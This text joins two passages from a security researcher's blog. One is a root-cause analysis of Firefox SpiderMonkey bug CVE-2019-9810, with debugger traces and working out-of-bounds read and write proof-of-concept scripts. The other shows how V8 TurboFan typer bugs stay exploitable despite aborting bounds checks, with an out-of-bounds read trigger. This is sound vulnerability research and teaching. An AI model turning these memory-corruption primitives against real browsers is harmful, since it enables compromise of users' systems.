  JitSpew(JitSpew_Codegen, "==== END CodeGenerator::generateBody ====\n");
  return true;
}

After theory, let's practice a bit and try to apply all of this learning against the PoC file.

Here is what I would like us to do: let's try to break into the assembly code generated by Ion for the function Target. Then, let's find the boundscheck so that we can trace forward and witness every step of the bug:

Check Idx against the initializedLength of the array
Storing the integer 0x41414141 inside the array's elements_ memory space
Calling slice on Special and making sure the size of Arr has been shrunk and that it is now 0
Finally, witnessing the out-of-bounds store

Before diving in, here is the code that generates the assembly code for the boundscheck instruction:

void CodeGenerator::visitBoundsCheck(LBoundsCheck* lir) {
  const LAllocation* index = lir->index();
  const LAllocation* length = lir->length();
  LSnapshot* snapshot = lir->snapshot();

  if (index->isConstant()) {
    // Use uint32 so that the comparison is unsigned.
    uint32_t idx = ToInt32(index);
    if (length->isConstant()) {
      uint32_t len = ToInt32(lir->length());
      if (idx < len) {
        return;
      }
      bailout(snapshot);
      return;
    }

    if (length->isRegister()) {
      bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), Imm32(idx),
                   snapshot);
    } else {
      bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), Imm32(idx),
                   snapshot);
    }
    return;
  }

  Register indexReg = ToRegister(index);
  if (length->isConstant()) {
    bailoutCmp32(Assembler::AboveOrEqual, indexReg, Imm32(ToInt32(length)),
                 snapshot);
  } else if (length->isRegister()) {
    bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), indexReg,
                 snapshot);
  } else {
    bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), indexReg,
                 snapshot);
  }
}

According to the code above, we can expect to have a cmp instruction emitted with two registers: the index and the length, as well as a conditional branch for bailing out if the index is bigger than the length. In our case, one thing to keep in mind is that the length is the initializedLength of the array and not the actual length as you can see in the MIR code:

18 | initializedlength elements17:Elements
19 | boundscheck unbox10:Int32 initializedlength18:Int32

Now let's get back to observing the PoC in action. One easy way that I found to break in a function generated by Ion right before it adds the native code for a specific LIR instruction is to set a breakpoint in the code generator for the instruction of your choice (or on js::jit::CodeGenerator::generateBody if you want to break at the entry point of the function) and then modify its internal buffer in order to add an int3 in the generated code.

This is another command that I added to sm.js called !ion_insertbp.

Check `Idx` against the `initializedLength` of the array

In our case, we are interested to break right before the boundscheck so let's set a breakpoint on js!js::jit::CodeGenerator::visitBoundsCheck, invoke !ion_insertbp and then we should be off to the races:

0:008> g
Breakpoint 0 hit
js!js::jit::CodeGenerator::visitBoundsCheck:
00007ff6`e62de1a0 4156            push    r14

0:000> !ion_insertbp
unsigned char 0xcc ''
unsigned int64 0xff
@$ion_insertbp()

0:000> g
(224c.2914): Break instruction exception - code 80000003 (first chance)
0000035c`97b8b299 cc              int     3

0:000> u . l2
0000035c`97b8b299 cc              int     3
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> t
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000030

Sweet; this cmp is basically the boundscheck instruction that compares the initializedLength (0x31) of the array (because we initialized Arr[0x30] a bunch of times when warming-up the JIT) to Idx which is 0x30. The index is in bounds and so the code doesn't bailout and keeps going forward.

Storing the integer `0x41414141` inside the array's `elements_` memory space

If we trace a little further we can see the code generated that loads the integer 0x41414141 into the array at the index 0x30:

0:000> 
0000035c`97b8b2ad 49bb414141410080f8ff mov r11,0FFF8800041414141h

0:000> 
0000035c`97b8b2b7 4c891cea        mov     qword ptr [rdx+rbp*8],r11 ds:000031ea`c7502348=fff88000000003e6

0:000> r @rdx,@rbp
rdx=000031eac75021c8 rbp=0000000000000030

And then the invocation of slice:

0:000>
0000035c`97b8b34b e83060ffff      call    0000035c`97b81380

0:000> t
00000289`d04b1380 48b9008021d658010000 mov rcx,158D6218000h

0:000> u . l20
...
0000035c`97b813c6 e815600000      call    0000035c`97b873e0

0:000> u 0000035c`97b873e0 l1
0000035c`97b873e0 ff2502000000    jmp     qword ptr [0000035c`97b873e8]

0:000> dqs 0000035c`97b873e8 l1
0000035c`97b873e8  00007ff6`e5c642a0 js!js::ArraySliceDense [c:\work\codes\mozilla-central\js\src\builtin\Array.cpp @ 3637]

Calling `slice` on `Special`

Then, making sure we triggered the side-effect and shrunk Arr right after the slicing operation (note that I added code in the PoC to print the address of Arr before and after the gc call otherwise we would have no way of getting its address). To witness that we have to do some more work to break on the right iteration (when Trigger is set to True) otherwise the function doesn't shrink Arr. This is to ensure that we warmed-up the JIT enough and that the function has been JIT'ed.

An easy way to break at the right iteration is by looking for something unique about it, like the fact that we use a different index: 0x20 instead of 0x30. For example, we can easily detect that with a breakpoint as below (on the cmp instruction for the boundscheck instruction):

0:000> bp 0000035c`97b8b29a ".if(@ecx == 0x20){}.else{gc}"

0:000> eb 0000035c`97b8b299 90

0:000> g
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000020

Now we can head straight-up to js::ArraySliceDense:

0:000> g js!js::ArraySliceDense+0x40d
js!js::ArraySliceDense+0x40d:
00007ff6`e5c646ad e8eee2ffff      call    js!js::array_slice (00007ff6`e5c629a0)

0:000> ? 000031eac75021c8 - (2*8) - (2*8) - 20
Evaluate expression: 54884436025736 = 000031ea`c7502188

0:000> !smdump_jsobject 0x00031eac7502188
31eac7502188: js!js::ArrayObject:            Length: 126
31eac7502188: js!js::ArrayObject:          Capacity: 126
31eac7502188: js!js::ArrayObject: InitializedLength: 49
31eac7502188: js!js::ArrayObject:           Content: [magic, magic, magic, magic, magic, magic, magic, magic, magic, magic, ...]
@$smdump_jsobject(0x00031eac7502188)

0:000> p
js!js::ArraySliceDense+0x412:
00007ff6`e5c646b2 48337c2450      xor     rdi,qword ptr [rsp+50h] ss:000000bd`675fd270=fffe2d69e5e05100

We grab the address of the array after the gc on stdout and let's see (the array got moved from 0x00031eac7502188 to 0x0002B0A9D08F160):

0:000> !smdump_jsobject 0x0002B0A9D08F160
2b0a9d08f160: js!js::ArrayObject:            Length: 0
2b0a9d08f160: js!js::ArrayObject:          Capacity: 6
2b0a9d08f160: js!js::ArrayObject: InitializedLength: 0
2b0a9d08f160: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x0002B0A9D08F160)

Witnessing the out-of-bounds store

And now the last stop is to observe the actual out-of-bounds happening.

0:000> 
0000035c`97b8b35d 8914c8          mov     dword ptr [rax+rcx*8],edx ds:00002b0a`9d08f290=4f4f4f4f

0:000> r.
rcx=00000000`00000020  rax=00002b0a`9d08f190  edx=00000000`000000bb

0:000> t
0000035c`97b8b360 c744c8040080f8ff mov     dword ptr [rax+rcx*8+4],0FFF88000h ds:00002b0a`9d08f294=4f4f4f4f

In the above @rax is the elements_ pointer that has a capacity of only 6 js::Value which means the only possible values of the index (@edx here) should be in [0 - 5]. In summary, we are able to write an integer js::Value which means we can control the lower 4 bytes but cannot control the upper 4 (that will be FFF88000). Thus, an ideal corruption target (doesn't mean this is the only thing we could do either) for this primitive is a size of an array like structure that is stored as a js::Value. Turns out this is exactly how the size of TypedArrays are stored - if you don't remember go have a look at my previous article Introduction to SpiderMonkey exploitation :).

In our case, if we look at the neighboring memory we find another array right behind us:

0:000> dqs 0x0002B0A9D08F160 l100
00002b0a`9d08f160  00002b0a`9d07dcd0
00002b0a`9d08f168  00002b0a`9d0987e8
00002b0a`9d08f170  00000000`00000000
00002b0a`9d08f178  00002b0a`9d08f190
00002b0a`9d08f180  00000000`00000000
00002b0a`9d08f188  00000000`00000006
00002b0a`9d08f190  fffa8000`00000000
00002b0a`9d08f198  fffa8000`00000000
00002b0a`9d08f1a0  fffa8000`00000000
00002b0a`9d08f1a8  fffa8000`00000000
00002b0a`9d08f1b0  fffa8000`00000000
00002b0a`9d08f1b8  fffa8000`00000000

00002b0a`9d08f1c0  00002b0a`9d07dc40 <- another array starting here
00002b0a`9d08f1c8  00002b0a`9d098890
00002b0a`9d08f1d0  00000000`00000000
00002b0a`9d08f1d8  00002b0a`9d08f1f0 <- elements_
00002b0a`9d08f1e0  00000000`00000000
00002b0a`9d08f1e8  00000000`00000006
00002b0a`9d08f1f0  2f2f2f2f`2f2f2f2f
00002b0a`9d08f1f8  2f2f2f2f`2f2f2f2f
00002b0a`9d08f200  2f2f2f2f`2f2f2f2f
00002b0a`9d08f208  2f2f2f2f`2f2f2f2f
00002b0a`9d08f210  2f2f2f2f`2f2f2f2f
00002b0a`9d08f218  2f2f2f2f`2f2f2f2f

So one way to get the interpreter to crash reliably is to overwrite its elements_ with a js::Value. It is guaranteed that this should crash the interpreter when it tries to collect the elements_ buffer as it won't even be a valid pointer. This field is reachable with the index 9 and so we just have to modify this line:

    Target(Snowflake, 0x9, 0xBB);

And tada:

(d0.348c): Access violation - code c0000005 (!!! second chance !!!)
js!js::gc::Arena::finalize<JSObject>+0x12e:
00007ff6`e601eb2e 8b43f0          mov     eax,dword ptr [rbx-10h] ds:fff88000`000000ab=????????

0:000> kc
 # Call Site
00 js!js::gc::Arena::finalize<JSObject>
01 js!FinalizeTypedArenas<JSObject>
02 js!FinalizeArenas
03 js!js::gc::ArenaLists::backgroundFinalize
04 js!js::gc::GCRuntime::sweepBackgroundThings
05 js!js::gc::GCRuntime::sweepFromBackgroundThread
06 js!js::GCParallelTaskHelper<js::gc::BackgroundSweepTask>::runTaskTyped
07 js!js::GCParallelTask::runFromMainThread
08 js!js::GCParallelTask::joinAndRunFromMainThread
09 js!js::gc::GCRuntime::endSweepingSweepGroup
0a js!sweepaction::SweepActionSequence<js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0b js!sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter,JSRuntime *,js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0c js!js::gc::GCRuntime::performSweepActions
0d js!js::gc::GCRuntime::incrementalSlice
0e js!js::gc::GCRuntime::gcCycle
0f js!js::gc::GCRuntime::collect
10 js!js::gc::GCRuntime::gc
11 js!JSRuntime::destroyRuntime
12 js!js::DestroyContext
13 js!main

Simplifying the PoC

OK so with this internal knowledge that we have gone through, we understand enough of the pieces at play to simplify the PoC. It's always good to verify assumptions in practice and so it'll be a good exercise to see if what we have learned above sticks.

First, we do not need an array of size 0x7e. Because the corruption target that we identified above is reachable at the index 0x20 (remember it's the neighboring array's elements_ field), we need the array to be able to store 0x21 elements. This is just to satisfy the boundscheck before we can shrink it.

We also know that the only role that the 0x30 index constant has been serving is to make sure that the first 0x30 elements in the array have been properly initialized. As the boundscheck operates against the initializedLength of the array, if we try to access at an index higher we will take a bailout. An easy way to not worry about this at all is to initialize entirely the array with a .fill(0) for example. Once this is done we can update the first index and use 0 instead of 0x30.

After all the modifications this is what you end up with:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

Conclusion

It has been quite some time that I’ve wanted to look at IonMonkey and this was a good opportunity (and a good spot to stop for now!).. We have covered quite a bit of content but obviously the engine is even more complicated as there are a bunch of things I haven't really studied yet.

At least we have uncovered the secrets of CVE-2019-9810 and its PoC as well as developed a few more commands for sm.js. For those that are interested in the exploit, you can find it here: CVE-2019-9810. It exploits Firefox on Windows 64-bit, loads a reflective-dll that embeds the payload. The payload infects the other tabs and sets-up a hook to inject arbitrary JavaScript. The demo payload changes the background of every visited website by the blog's background theme as well as redirecting every link to doar-e.github.io :).

If this was interesting for you, you might want to have a look at those other good resources concerning IonMonkey:

@5aelo writes very detailed root-cause analysis of the bugs he has found which is a great resource:
wiki mozilla/IonMonkey,
SSD Advisory – Firefox Information Leak by @_niklasb and by @bkth_.

As usual, big up to my mates @yrp604 and @__x86 for proofreading this article.

And if you want a bit more, what follows is a bunch of extra questions you might have asked yourself while reading that I answer (but that did not really fit the overall narrative) as well as a few puzzles if you want to explore Ion even more!

Little puzzles & extra quests

As said above, here are a bunch of extra questions / puzzles that did not really fit in the narrative. This does not mean they are not interesting so I just decided to stuff them here :).

Why does `AccessArray(10)` triggers a bailout?

let Arr = null;
function AccessArray(Idx) {
    Arr[Idx] = 0xaaaaaaaa;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1);
}

AccessArray(10);

Can the write out-of-bounds be transformed into an information disclosure?

It can! We can abuse the loadelement MIR instruction the same way we abused storeelement in which case we can read out-of-bounds memory.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    print(Target(Snowflake, 0x6));
}

main();

What's a good way to check if the engine is vulnerable?

The most reliable way to check if the engine is vulnerable that I found is to actually use the vulnerability as out-of-bounds read to go and attempt to read out-of-bounds. At this point, there are two possible outcomes: correct execution should return undefined as the array has a size of 0, or you read leftover data in which case it is vulnerable.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7);
    Arr.fill(1337);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    const Ret = Target(Snowflake, 0x5);
    if(Ret === undefined) {
        print(':( not vulnerable');
    } else {
        print(':) vulnerable');
    }
}

main();

Can you write something bigger than a simple uint32?

In the blogpost, we focused on the integer JSValue out-of-bounds write, but you can also use it to store an arbitrary qword. Here is an example writing 0x44332211deadbeef!

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 4e-324;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, 5e-324);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 352943125510189150000);
}

main();

And here is the crash you should get eventually:

(e08.36ac): Access violation - code c0000005 (!!! second chance !!!)
mozglue!arena_dalloc+0x11:
00007ffc`773323a1 488b3e          mov     rdi,qword ptr [rsi] ds:44332211`dea00000=????????????????

0:000> dv /v aPtr
@rcx                         aPtr = 0x44332211`deadbeef

Why does using `0xdeadbeef` as a value triggers a bailout?

let Arr = null;
function AccessArray(Idx, Value) {
    Arr[Idx] = Value;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1, 0xaa);
}

AccessArray(1, 0xdead);
print('dead worked!');
AccessArray(1, 0xdeadbeef);

Diary of a reverse-engineer
Circumventing Chrome's hardening of typer bugsJeremy "__x86" Fetiveau
9 May 2019 at 15:00

Circumventing Chrome's hardening of typer bugs

Diary of a reverse-engineer

By: Jeremy "__x86" Fetiveau

9 May 2019 at 15:00

Introduction

Some recent Chrome exploits were taking advantage of Bounds-Check-Elimination in order to get a R/W primitive from a TurboFan's typer bug (a bug that incorrectly computes type information during code optimization). Indeed during the simplified lowering phase when visiting a CheckBounds node if the engine can guarantee that the used index is always in-bounds then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bound checks. It means that CheckBounds will never get removed during simplified lowering. As mentioned by Mark Brand's article on the Google Project Zero blog and tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Table of contents:

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5
Author: Jaroslav Sevcik <[email protected]>
Date:   Fri Feb 8 16:26:18 2019 +0100

    [turbofan] Introduce aborting bounds checks.

    Instead of eliminating bounds checks based on types, we introduce
    an aborting bounds check that crashes rather than deopts.

    Bug: v8:8806
    Change-Id: Icbd9c4554b6ad20fe4135b8622590093679dac3f
    Reviewed-on: https://chromium-review.googlesource.com/c/1460461
    Commit-Queue: Jaroslav Sevcik <[email protected]>
    Reviewed-by: Tobias Tebbi <[email protected]>
    Cr-Commit-Position: refs/heads/master@{#59467}

Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          CheckBoundsParameters::Mode mode =
              CheckBoundsParameters::kDeoptOnOutOfBounds;
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            mode = CheckBoundsParameters::kAbortOnOutOfBounds;         // [1]
          }
          NodeProperties::ChangeOp(
              node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
        }
// [...]
  }

Before the commit, if condition [1] happens, the bound check would have been removed using a call to DeferReplacement(node, node->InputAt(0));. Now, what happens instead is that the node gets lowered to a CheckedUint32Bounds with a AbortOnOutOfBounds mode [2].

Effect linearization

When the effect control linearizer (one of the optimization phase) kicks in, here is how the CheckedUint32Bounds gets lowered :

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
                                                        Node* frame_state) {
  Node* index = node->InputAt(0);
  Node* limit = node->InputAt(1);
  const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

  Node* check = __ Uint32LessThan(index, limit);
  switch (params.mode()) {
    case CheckBoundsParameters::kDeoptOnOutOfBounds:
      __ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
                         params.check_parameters().feedback(), check,
                         frame_state, IsSafetyCheck::kCriticalSafetyCheck);
      break;
    case CheckBoundsParameters::kAbortOnOutOfBounds: {
      auto if_abort = __ MakeDeferredLabel();
      auto done = __ MakeLabel();

      __ Branch(check, &done, &if_abort);

      __ Bind(&if_abort);
      __ Unreachable();
      __ Goto(&done);

      __ Bind(&done);
      break;
    }
  }

  return index;
}

Long story short, the CheckedUint32Bounds is replaced by an Uint32LessThan node (plus the index and limit nodes). In case of an out-of-bounds there will be no deoptimization possible but instead we will reach an Unreachable node.

During instruction selection Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {
  OperandGenerator g(this);
  Emit(kArchDebugBreak, g.NoOutput());
}

Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {
  let arr = [1,2,3,4];
  let badly_typed = 0;
  let idx = badly_typed * 5;
  return arr[idx];
};
opt_me();
%OptimizeFunctionOnNextCall(opt_me);
opt_me();

With this example, we're going to observe a few things:

simplified lowering does not remove the CheckBounds node as it would have before,
the lowering of this node and how it leads to the creation of an Unreachable node,
eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds

Without surprise, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.

CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.

Effect Linearization : CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.

Late optimization : MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). In the case of Uint32LessThan being replaced by a constant node the rest of the code, including the Unreachable node, will be removed by the dead code elimination. Therefore, no bounds check remains and no breakpoint will ever be reached, regardless of any OOB accesses that are attempted.

// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
  switch (node->opcode()) {
// [...]
      case IrOpcode::kUint32LessThan: {
      Uint32BinopMatcher m(node);
      if (m.left().Is(kMaxUInt32)) return ReplaceBool(false);  // M < x => false
      if (m.right().Is(0)) return ReplaceBool(false);          // x < 0 => false
      if (m.IsFoldable()) {                                    // K < K => K
        return ReplaceBool(m.left().Value() < m.right().Value());
      }
      if (m.LeftEqualsRight()) return ReplaceBool(false);  // x < x => false
      if (m.left().IsWord32Sar() && m.right().HasValue()) {
        Int32BinopMatcher mleft(m.left().node());
        if (mleft.right().HasValue()) {
          // (x >> K) < C => x < (C << K)
          // when C < (M >> K)
          const uint32_t c = m.right().Value();
          const uint32_t k = mleft.right().Value() & 0x1F;
          if (c < static_cast<uint32_t>(kMaxInt >> k)) {
            node->ReplaceInput(0, mleft.left().node());
            node->ReplaceInput(1, Uint32Constant(c << k));
            return Changed(node);
          }
          // TODO(turbofan): else the comparison is always true.
        }
      }
      break;
    }
// [...]

Final scheduling : no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

final_asm

To sum up :

arr[good_idx] leads to the creation of a CheckBounds node in the early phases
during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds
The CheckedUint32Bounds gets replaced by several nodes during "effect linearization" : Uint32LessThan and Unreachable
Uint32LessThan is constant folded during the "Late Optimization" phase
The Unreachable node is removed during dead code elimination of the "Late Optimization" phase
Only a simple Load remains during the final scheduling
Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is: Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#astIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string with a length of kMaxLength, the computed Range type will be kMaxLength - 1 while it is actually kMaxLength.

const str = "____"+"DOARE".repeat(214748359);
String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength

We can then amplify this typing error.

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30; // type is Range(0,0) instead of Range(1,1)

If all of this seems unclear, check my previous introduction to TurboFan and my github.

Now, consider the following trigger poc :

SUCCESS = 0;
FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {
  const OOB_OFFSET = 5;

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30;

  let bad = badly_typed * OOB_OFFSET;
  let leak = 0;

  if (bad >= OOB_OFFSET && ++it < 0x10000) {
    leak = 0;
  }
  else {
    let arr = new Array(1.1,1.1);
    arr2 = new Array({},{});
    leak = arr[bad];
    if (leak != undefined) {
      return leak;
    }
  }
  return FAILURE;
};

let res = opt_me();
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
%DisassembleFunction(opt_me); // prints nothing on release builds
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
print(res);
%DisassembleFunction(opt_me); // prints nothing on release builds

Checkout the result :

$ d8 poc.js
1.5577100569205e-310

It worked despite those aborting bound checks. Why? The line leak = arr[bad] didn’t lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction).

Native context specialization of an element access

The answer lies in the native context specialization. This is one of the early optimization phase where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute.

One of the first optimization phase is the inlining phase, that includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess.

There is one case that looks very interesting when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.

    } else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
               CanTreatHoleAsUndefined(receiver_maps)) {
      // Check that the {index} is a valid array index, we do the actual
      // bounds check below and just skip the store below if it's out of
      // bounds for the {receiver}.
      index = effect = graph()->NewNode(
          simplified()->CheckBounds(VectorSlotPair()), index,
          jsgraph()->Constant(Smi::kMaxValue), effect, control);
    } else {

In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue.

The actual bound checking nodes are added as follows:

      if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
          CanTreatHoleAsUndefined(receiver_maps)) {
        Node* check =
            graph()->NewNode(simplified()->NumberLessThan(), index, length);       // [1]
        Node* branch = graph()->NewNode(
            common()->Branch(BranchHint::kTrue,
                             IsSafetyCheck::kCriticalSafetyCheck),
            check, control);

        Node* if_true = graph()->NewNode(common()->IfTrue(), branch);              // [2]
        Node* etrue = effect;
        Node* vtrue;
        {
          // Perform the actual load
          vtrue = etrue =
              graph()->NewNode(simplified()->LoadElement(element_access),          // [3]
                               elements, index, etrue, if_true);

        // [...]
        }

      // [...]
      }

In a nutshell, with this mode :

CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF),
A NumberLessThan node is generated,
An IfTrue node is generated,
In the "true" branch, there will be a LoadElement node.

The length used by the NumberLessThan node comes from a previously generated LoadField:

    Node* length = effect =
        receiver_is_jsarray
            ? graph()->NewNode(
                  simplified()->LoadField(
                      AccessBuilder::ForJSArrayLength(elements_kind)),
                  receiver, effect, control)
            : graph()->NewNode(
                  simplified()->LoadField(AccessBuilder::ForFixedArrayLength()),
                  elements, effect, control);

All of this means that TurboFan does generate some bound checking nodes but there won't be any aborting bound check because of the kMaxValue length being used (well technically there is, but the maximum length is unlikely to be reached!).

Type narrowing and constant folding of NumberLessThan

After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TyperNarrowingReducer is going to change the type [2] with op_typer_.singleton_true() [1].

    case IrOpcode::kNumberLessThan: {
      // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
      // comparisons with the operation typer).
      Type left_type = NodeProperties::GetType(node->InputAt(0));
      Type right_type = NodeProperties::GetType(node->InputAt(1));
      if (left_type.Is(Type::PlainNumber()) &&
          right_type.Is(Type::PlainNumber())) {
        if (left_type.Max() < right_type.Min()) {
          new_type = op_typer_.singleton_true();              // [1]
        } else if (left_type.Min() >= right_type.Max()) {
          new_type = op_typer_.singleton_false();
        }
      }   
      break;
    }   
  // [...]
  Type original_type = NodeProperties::GetType(node);
  Type restricted = Type::Intersect(new_type, original_type, zone());
  if (!original_type.Is(restricted)) {
    NodeProperties::SetType(node, restricted);                 // [2]
    return Changed(node);
  }

Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  // Check if the output type is a singleton.  In that case we already know the
  // result value and can simply replace the node if it's eliminable.
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable)) {
    // TODO(v8:5303): We must not eliminate FinishRegion here. This special
    // case can be removed once we have separate operators for value and
    // effect regions.
    if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();
    // We can only constant-fold nodes here, that are known to not cause any
    // side-effect, may it be a JavaScript observable side-effect or a possible
    // eager deoptimization exit (i.e. {node} has an operator that doesn't have
    // the Operator::kNoDeopt property).
    Type upper = NodeProperties::GetType(node);
    if (!upper.IsNone()) {
      Node* replacement = nullptr;
      if (upper.IsHeapConstant()) {
        replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());
      } else if (upper.Is(Type::MinusZero())) {
        Factory* factory = jsgraph()->isolate()->factory();
        ObjectRef minus_zero(broker(), factory->minus_zero_value());
        replacement = jsgraph()->Constant(minus_zero);
      } else if (upper.Is(Type::NaN())) {
        replacement = jsgraph()->NaNConstant();
      } else if (upper.Is(Type::Null())) {
        replacement = jsgraph()->NullConstant();
      } else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) {
        replacement = jsgraph()->Constant(upper.Min());
      } else if (upper.Is(Type::Undefined())) {
        replacement = jsgraph()->UndefinedConstant();
      }   
      if (replacement) {
        // Make sure the node has a type.
        if (!NodeProperties::IsTyped(replacement)) {
          NodeProperties::SetType(replacement, upper);
        }
        ReplaceWithValue(node, replacement);
        return Changed(replacement);
      }   
    }
  }
  return NoChange();
}

We confirm this behaviour using --trace-turbo-reduction:

